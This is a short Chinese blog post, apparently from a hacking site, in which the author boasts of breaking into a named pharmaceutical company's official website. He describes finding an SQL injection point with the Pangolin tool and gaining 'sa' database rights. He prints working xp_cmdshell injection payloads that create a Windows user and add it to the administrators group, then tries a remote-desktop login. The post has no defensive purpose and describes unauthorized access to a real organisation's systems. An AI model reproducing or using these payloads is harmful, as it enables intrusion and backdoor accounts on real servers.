修正药业官网被黑!

分类:安全 | 2012-02-20 | 撸过 63 次
1人扯谈

今天在网络上乱逛 不知道怎么的弹出一个修正药业的广告 点了进去就进修正的官方 在里面乱逛 看见一个注入

可是键入代码网页没有直接显示 我就丢到 Pangolin里面看看

果断的是注入点 后来验证是sa

是sa就太方便了

直接调用xp_cmdshell

上代码

;exec master..xp_cmdshell”net user name password /add”–

;exec master..xp_cmdshell”net localgroup name administrators /add”–

不解释,因为网页不显示 就抱着侥幸的心理去连3389

 

输入帐号密码 ….

 

 

FROM GuoKer

本站内容均为原创,转载请务必保留署名与链接!
修正药业官网被黑!:https://www.webshell.cc/3125.html
标签: ,

相关日志